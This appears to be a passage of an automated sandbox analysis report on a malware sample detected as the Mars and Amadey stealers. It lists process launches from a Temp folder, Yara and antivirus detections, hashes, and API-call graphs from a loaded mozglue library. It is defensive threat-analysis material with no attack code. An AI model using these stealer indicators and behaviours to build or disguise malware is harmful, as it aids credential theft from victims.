                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 55%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:02:39:00
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0xda0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2659626810.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000003.2619135843.0000000005040000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:02:40:00
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0xda0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.3262726628.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000003.3222116129.0000000005280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:02:41:00
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0xda0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.3863894754.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000003.3823052795.0000000005220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:02:42:00
                                                                Start date:03/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0xda0000
                                                                File size:1'925'632 bytes
                                                                MD5 hash:E5063918FA59220D9ED0825CD9DB008D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000003.4421982821.0000000005570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.4462261068.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:0.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:30.6%
                                                                  Total number of Nodes:108
                                                                  Total number of Limit Nodes:12
                                                                  execution_graph 45251 6c9eb8ae 45253 6c9eb8ba ___scrt_is_nonwritable_in_current_image 45251->45253 45252 6c9eb8c9 45253->45252 45254 6c9eb8e3 dllmain_raw 45253->45254 45255 6c9eb8de 45253->45255 45254->45252 45256 6c9eb8fd dllmain_crt_dispatch 45254->45256 45264 6c9cbed0 DisableThreadLibraryCalls LoadLibraryExW 45255->45264 45256->45252 45256->45255 45258 6c9eb91e 45259 6c9eb94a 45258->45259 45265 6c9cbed0 DisableThreadLibraryCalls LoadLibraryExW 45258->45265 45259->45252 45260 6c9eb953 dllmain_crt_dispatch 45259->45260 45260->45252 45262 6c9eb966 dllmain_raw 45260->45262 45262->45252 45263 6c9eb936 dllmain_crt_dispatch dllmain_raw 45263->45259 45264->45258 45265->45263 45266 6c9eb694 45267 6c9eb6a0 ___scrt_is_nonwritable_in_current_image 45266->45267 45296 6c9eaf2a 45267->45296 45269 6c9eb6a7 45270 6c9eb796 45269->45270 45271 6c9eb6d1 45269->45271 45274 6c9eb6ac ___scrt_is_nonwritable_in_current_image 45269->45274 45313 6c9eb1f7 IsProcessorFeaturePresent 45270->45313 45300 6c9eb064 45271->45300 45275 6c9eb6e0 __RTC_Initialize 45275->45274 45303 6c9ebf89 InitializeSListHead 45275->45303 45277 6c9eb7b3 ___scrt_uninitialize_crt __RTC_Initialize 45278 6c9eb6ee ___scrt_initialize_default_local_stdio_options 45280 6c9eb6f3 _initterm_e 45278->45280 45279 6c9eb79d ___scrt_is_nonwritable_in_current_image 45279->45277 45281 6c9eb828 45279->45281 45282 6c9eb7d2 45279->45282 45280->45274 45283 6c9eb708 45280->45283 45284 6c9eb1f7 ___scrt_fastfail 6 API calls 45281->45284 45317 6c9eb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 45282->45317 45304 6c9eb072 45283->45304 45287 6c9eb82f 45284->45287 45292 6c9eb86e dllmain_crt_process_detach 45287->45292 45293 6c9eb83b 45287->45293 45288 6c9eb7d7 45318 6c9ebf95 __std_type_info_destroy_list 45288->45318 45290 6c9eb70d 45290->45274 45291 6c9eb711 _initterm 45290->45291 45291->45274 45295 6c9eb840 45292->45295 45294 6c9eb860 dllmain_crt_process_attach 45293->45294 45293->45295 45294->45295 45297 6c9eaf33 45296->45297 45319 6c9eb341 IsProcessorFeaturePresent 45297->45319 45299 6c9eaf3f ___scrt_uninitialize_crt 45299->45269 45320 6c9eaf8b 45300->45320 45302 6c9eb06b 45302->45275 45303->45278 45305 6c9eb077 ___scrt_release_startup_lock 45304->45305 45306 6c9eb07b 45305->45306 45307 6c9eb082 45305->45307 45330 6c9eb341 IsProcessorFeaturePresent 45306->45330 45310 6c9eb087 _configure_narrow_argv 45307->45310 45309 6c9eb080 45309->45290 45311 6c9eb095 _initialize_narrow_environment 45310->45311 45312 6c9eb092 45310->45312 45311->45309 45312->45290 45314 6c9eb20c ___scrt_fastfail 45313->45314 45315 6c9eb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45314->45315 45316 6c9eb302 ___scrt_fastfail 45315->45316 45316->45279 45317->45288 45318->45277 45319->45299 45321 6c9eaf9e 45320->45321 45322 6c9eaf9a 45320->45322 45323 6c9eb028 45321->45323 45326 6c9eafab ___scrt_release_startup_lock 45321->45326 45322->45302 45324 6c9eb1f7 ___scrt_fastfail 6 API calls 45323->45324 45325 6c9eb02f 45324->45325 45327 6c9eafb8 _initialize_onexit_table 45326->45327 45328 6c9eafd6 45326->45328 45327->45328 45329 6c9eafc7 _initialize_onexit_table 45327->45329 45328->45302 45329->45328 45330->45309 45331 6c9b3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 45336 6c9eab2a 45331->45336 45335 6c9b30db 45340 6c9eae0c _crt_atexit _register_onexit_function 45336->45340 45338 6c9b30cd 45339 6c9eb320 5 API calls ___raise_securityfailure 45338->45339 45339->45335 45340->45338 45341 6c9b35a0 45342 6c9b35c4 InitializeCriticalSectionAndSpinCount getenv 45341->45342 45357 6c9b3846 __aulldiv 45341->45357 45344 6c9b38fc strcmp 45342->45344 45356 6c9b35f3 __aulldiv 45342->45356 45346 6c9b3912 strcmp 45344->45346 45344->45356 45345 6c9b38f4 45346->45356 45347 6c9b35f8 QueryPerformanceFrequency 45347->45356 45348 6c9b3622 _strnicmp 45350 6c9b3944 _strnicmp 45348->45350 45348->45356 45349 6c9b376a QueryPerformanceCounter EnterCriticalSection 45351 6c9b37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 45349->45351 45354 6c9b375c 45349->45354 45352 6c9b395d 45350->45352 45350->45356 45351->45354 45355 6c9b37fc LeaveCriticalSection 45351->45355 45353 6c9b3664 GetSystemTimeAdjustment 45353->45356 45354->45349 45354->45351 45354->45355 45354->45357 45355->45354 45355->45357 45356->45347 45356->45348 45356->45350 45356->45352 45356->45353 45356->45354 45358 6c9eb320 5 API calls ___raise_securityfailure 45357->45358 45358->45345 45359 6c9cc930 GetSystemInfo VirtualAlloc 45360 6c9cc9a3 GetSystemInfo 45359->45360 45361 6c9cc973 45359->45361 45363 6c9cc9b6 45360->45363 45364 6c9cc9d0 45360->45364 45375 6c9eb320 5 API calls ___raise_securityfailure 45361->45375 45363->45364 45367 6c9cc9bd 45363->45367 45364->45361 45365 6c9cc9d8 VirtualAlloc 45364->45365 45368 6c9cc9ec 45365->45368 45369 6c9cc9f0 45365->45369 45366 6c9cc99b 45367->45361 45370 6c9cc9c1 VirtualFree 45367->45370 45368->45361 45376 6c9ecbe8 GetCurrentProcess TerminateProcess 45369->45376 45370->45361 45375->45366 45377 6c9eb9c0 45378 6c9eb9ce dllmain_dispatch 45377->45378 45379 6c9eb9c9 45377->45379 45381 6c9ebef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45379->45381 45381->45378

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3F688,00001000), ref: 6C9B35D5
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9B35E0
                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C9B35FD
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C9B363F
                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C9B369F
                                                                  • __aulldiv.LIBCMT ref: 6C9B36E4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C9B3773
                                                                  • EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9B377E
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9B37BD
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C9B37C4
                                                                  • EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9B37CB
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9B3801
                                                                  • __aulldiv.LIBCMT ref: 6C9B3883
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C9B3902
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C9B3918
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C9B394C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                  • API String ID: 301339242-3790311718
                                                                  • Opcode ID: 5f2f178339c994097fd0b09515ee15c95f0b392acdb0434e541dd6ee6e267ff2
                                                                  • Instruction ID: 87403082c938be67d6c1e618c3618aff72c4f112377296f8b953543000be037f
                                                                  • Opcode Fuzzy Hash: 5f2f178339c994097fd0b09515ee15c95f0b392acdb0434e541dd6ee6e267ff2
                                                                  • Instruction Fuzzy Hash: 4CB1A071B153529BDB1CCF28CC6465AB7F6BB8A704F04892DE89DD3390DB30D8068B85

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C9CC947
                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C9CC969
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C9CC9A9
                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C9CC9C8
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C9CC9E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                  • String ID:
                                                                  • API String ID: 4191843772-0
                                                                  • Opcode ID: 1bae16c69938a1c18627050d069dda6c4be59a772c1f360cd026019de2e10309
                                                                  • Instruction ID: b4486afb32cc3675b14e16c5b090588918b52afe1fc9af4824a0016520ce7c4e
                                                                  • Opcode Fuzzy Hash: 1bae16c69938a1c18627050d069dda6c4be59a772c1f360cd026019de2e10309
                                                                  • Instruction Fuzzy Hash: 22213A317017166BDB19AA24DC98BAEB779AF4A344F50411DF90BE7A80DB30DC418792

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C9B3095
                                                                    • Part of subcall function 6C9B35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3F688,00001000), ref: 6C9B35D5
                                                                    • Part of subcall function 6C9B35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9B35E0
                                                                    • Part of subcall function 6C9B35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9B35FD
                                                                    • Part of subcall function 6C9B35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C9B363F
                                                                    • Part of subcall function 6C9B35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C9B369F
                                                                    • Part of subcall function 6C9B35A0: __aulldiv.LIBCMT ref: 6C9B36E4
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B309F
                                                                    • Part of subcall function 6C9D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B85
                                                                    • Part of subcall function 6C9D5B50: EnterCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B90
                                                                    • Part of subcall function 6C9D5B50: LeaveCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5BD8
                                                                    • Part of subcall function 6C9D5B50: GetTickCount64.KERNEL32 ref: 6C9D5BE4
                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9B30BE
                                                                    • Part of subcall function 6C9B30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C9B3127
                                                                    • Part of subcall function 6C9B30F0: __aulldiv.LIBCMT ref: 6C9B3140
                                                                    • Part of subcall function 6C9EAB2A: __onexit.LIBCMT ref: 6C9EAB30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                  • String ID:
                                                                  • API String ID: 4291168024-0
                                                                  • Opcode ID: e04ff50c864fe187837fc0f0dffa41a7d510595f41ad17b06c7d755398b06d7e
                                                                  • Instruction ID: 18c044645695a098a5345ed8fdea28b2c51b08c9a2b1d2bbcd064a42ed66037f
                                                                  • Opcode Fuzzy Hash: e04ff50c864fe187837fc0f0dffa41a7d510595f41ad17b06c7d755398b06d7e
                                                                  • Instruction Fuzzy Hash: 6BF0A252E30B8A96CB24DF348D511E6B370AF7B114B10A31EE84CA3521FB30A1D98391

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 290 1322e84-1322e93 call 1232d28 293 1322e98-1322e9d call 123ba50 290->293 295 1322ea2-1322ea5 293->295 296 1322eab-1322eb9 295->296 297 1322f2e-1322f31 295->297 300 1322ebb-1322ec9 call 128df44 296->300 301 1322f2c 296->301 298 1322f33-1322f3d call 1322c64 297->298 299 1322f3f-1322f41 297->299 298->299 299->293 300->301 306 1322ecb-1322eed call 1232d28 300->306 301->297 309 1322f07-1322f15 306->309 310 1322eef-1322f05 306->310 309->301 311 1322f17-1322f27 call 1323640 309->311 310->309 311->301
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2271691521.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.000000000113A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000001215000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000001376000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.0000000001405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.000000000171B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2271711490.00000000019BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b1d1b160a0d21bdbe406072e1498f2b3678171fb38fefc40e47ccb81e733111b
                                                                  • Instruction ID: 66bb77086cf43ed4e53b980d19aab5b560623ae792653494e0744f1a34094bbd
                                                                  • Opcode Fuzzy Hash: b1d1b160a0d21bdbe406072e1498f2b3678171fb38fefc40e47ccb81e733111b
                                                                  • Instruction Fuzzy Hash: 2F11C4747102219FE325EF6DD8C4E26B7ABBB8A314F0482B1D40487398DF74AC45CB54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 642 6c9c5440-6c9c5475 643 6c9c5477-6c9c548b call 6c9eab89 642->643 644 6c9c54e3-6c9c54ea 642->644 643->644 655 6c9c548d-6c9c54e0 getenv * 3 call 6c9eab3f 643->655 645 6c9c563e-6c9c5658 GetCurrentThreadId _getpid call 6c9f94d0 644->645 646 6c9c54f0-6c9c54f7 644->646 653 6c9c5660-6c9c566b 645->653 649 6c9c54f9-6c9c54ff GetCurrentThreadId 646->649 650 6c9c5504-6c9c550b 646->650 649->650 650->653 654 6c9c5511-6c9c5521 getenv 650->654 658 6c9c5670 call 6c9ecbe8 653->658 656 6c9c5675-6c9c567c call 6c9fcf50 exit 654->656 657 6c9c5527-6c9c553d 654->657 655->644 667 6c9c5682-6c9c568d 656->667 660 6c9c553f call 6c9c5d40 657->660 658->656 663 6c9c5544-6c9c5546 660->663 666 6c9c554c-6c9c55f1 GetCurrentThreadId AcquireSRWLockExclusive moz_xmalloc ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ call 6c9c5e60 getenv 663->666 663->667 672 6c9c5697-6c9c569c 666->672 673 6c9c55f7-6c9c5613 ReleaseSRWLockExclusive 666->673 670 6c9c5692 call 6c9ecbe8 667->670 670->672 674 6c9c569e-6c9c56a0 672->674 675 6c9c56cf-6c9c56d2 672->675 678 6c9c561f-6c9c5625 673->678 679 6c9c5615-6c9c561c free 673->679 674->673 680 6c9c56a6-6c9c56a9 674->680 676 6c9c56d9-6c9c56dd 675->676 677 6c9c56d4-6c9c56d7 675->677 676->673 681 6c9c56e3-6c9c56f3 getenv 676->681 677->676 677->681 682 6c9c56ad-6c9c56b6 free 678->682 683 6c9c562b-6c9c563d call 6c9eb320 678->683 679->678 680->676 684 6c9c56ab 680->684 681->673 685 6c9c56f9-6c9c5705 call 6c9f9420 681->685 682->683 684->681 690 6c9c5724-6c9c573c getenv 685->690 691 6c9c5707-6c9c5721 GetCurrentThreadId _getpid call 6c9f94d0 685->691 693 6c9c573e-6c9c5743 690->693 694 6c9c5749-6c9c5759 getenv 690->694 691->690 693->694 696 6c9c5888-6c9c58a3 _errno strtol 693->696 697 6c9c575b-6c9c5760 694->697 698 6c9c5766-6c9c5784 getenv 694->698 699 6c9c58a4-6c9c58af 696->699 697->698 700 6c9c58ea-6c9c593b call 6c9b4290 call 6c9cb410 call 6ca1a310 call 6c9d5e30 697->700 701 6c9c5786-6c9c578b 698->701 702 6c9c5791-6c9c57a1 getenv 698->702 699->699 706 6c9c58b1-6c9c58bc strlen 699->706 768 6c9c5cf8-6c9c5cfe 700->768 788 6c9c5941-6c9c594f 700->788 701->702 703 6c9c59c4-6c9c59d8 strlen 701->703 704 6c9c57ae-6c9c57c3 getenv 702->704 705 6c9c57a3-6c9c57a8 702->705 708 6c9c5cce-6c9c5cd9 703->708 709 6c9c59de-6c9c5a00 call 6ca1a310 703->709 711 6c9c5808-6c9c583b call 6c9fd210 call 6c9fcc00 call 6c9f9420 704->711 712 6c9c57c5-6c9c57d5 getenv 704->712 705->704 710 6c9c5a7f-6c9c5aa0 _errno strtol _errno 705->710 713 6c9c5be8-6c9c5bf1 _errno 706->713 714 6c9c58c2-6c9c58c5 706->714 725 6c9c5cde call 6c9ecbe8 708->725 742 6c9c5a06-6c9c5a1a 709->742 743 6c9c5d00-6c9c5d01 709->743 726 6c9c5d1b-6c9c5d21 710->726 727 6c9c5aa6-6c9c5ab2 call 6c9f9420 710->727 790 6c9c583d-6c9c5858 GetCurrentThreadId _getpid call 6c9f94d0 711->790 791 6c9c585b-6c9c5862 711->791 718 6c9c57d7-6c9c57dc 712->718 719 6c9c57e2-6c9c57fb call 6c9fd320 712->719 721 6c9c5bf7-6c9c5bf9 713->721 722 6c9c5d23-6c9c5d29 713->722 723 6c9c5bcd-6c9c5bdf 714->723 724 6c9c58cb-6c9c58ce 714->724 718->719 730 6c9c5adb-6c9c5af5 call 6c9fd210 718->730 754 6c9c5800-6c9c5803 719->754 721->722 736 6c9c5bff-6c9c5c1d 721->736 734 6c9c5d06-6c9c5d0b call 6c9f94d0 722->734 732 6c9c5c7d-6c9c5c8f 723->732 733 6c9c5be5 723->733 737 6c9c5d2b-6c9c5d38 call 6c9f94d0 724->737 738 6c9c58d4-6c9c58dc 724->738 739 6c9c5ce3-6c9c5cee 725->739 726->734 727->712 761 6c9c5ab8-6c9c5ad6 GetCurrentThreadId _getpid call 6c9f94d0 727->761 774 6c9c5af7-6c9c5afe free 730->774 775 6c9c5b01-6c9c5b25 call 6c9f9420 730->775 752 6c9c5c91-6c9c5c94 732->752 753 6c9c5cb2-6c9c5cc4 732->753 733->713 769 6c9c5d0e-6c9c5d15 call 6c9fcf50 exit 734->769 745 6c9c5c1f-6c9c5c22 736->745 746 6c9c5c25-6c9c5c3c call 6c9f9420 736->746 737->769 747 6c9c5c68-6c9c5c70 738->747 748 6c9c58e2-6c9c58e5 738->748 756 6c9c5cf3 call 6c9ecbe8 739->756 742->743 758 6c9c5a20-6c9c5a2e 742->758 743->734 745->746 746->694 780 6c9c5c42-6c9c5c63 GetCurrentThreadId _getpid call 6c9f94d0 746->780 762 6c9c5c99-6c9c5ca1 747->762 763 6c9c5c72-6c9c5c78 747->763 748->713 752->713 753->737 766 6c9c5cc6-6c9c5cc9 753->766 754->673 756->768 758->743 770 6c9c5a34-6c9c5a40 call 6c9f9420 758->770 761->712 762->737 776 6c9c5ca7-6c9c5cad 762->776 763->713 766->713 768->734 769->726 770->702 795 6c9c5a46-6c9c5a7a GetCurrentThreadId _getpid call 6c9f94d0 770->795 774->775 798 6c9c5b45-6c9c5b70 _getpid 775->798 799 6c9c5b27-6c9c5b42 GetCurrentThreadId _getpid call 6c9f94d0 775->799 776->713 780->694 788->768 797 6c9c5955 788->797 790->791 793 6c9c586e-6c9c5874 791->793 794 6c9c5864-6c9c586b free 791->794 793->712 801 6c9c587a-6c9c5883 free 793->801 794->793 795->702 803 6c9c5957-6c9c595d 797->803 804 6c9c5962-6c9c596e call 6c9f9420 797->804 806 6c9c5b7a-6c9c5b96 ?FiltersExcludePid@detail@profiler@mozilla@@YA_NV?$Span@QBD$0PPPPPPPP@@3@VBaseProfilerProcessId@baseprofiler@3@@Z 798->806 807 6c9c5b72-6c9c5b74 798->807 799->798 801->712 803->804 804->698 815 6c9c5974-6c9c5979 804->815 806->719 808 6c9c5b9c-6c9c5ba8 call 6c9f9420 806->808 807->708 807->806 808->673 816 6c9c5bae-6c9c5bc8 GetCurrentThreadId _getpid call 6c9f94d0 808->816 815->739 817 6c9c597f-6c9c59bf GetCurrentThreadId _getpid call 6c9f94d0 815->817 816->754 817->698
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C9C5492
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9C54A8
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9C54BE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C54DB
                                                                    • Part of subcall function 6C9EAB3F: EnterCriticalSection.KERNEL32(6CA3E370,?,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB49
                                                                    • Part of subcall function 6C9EAB3F: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EAB7C
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
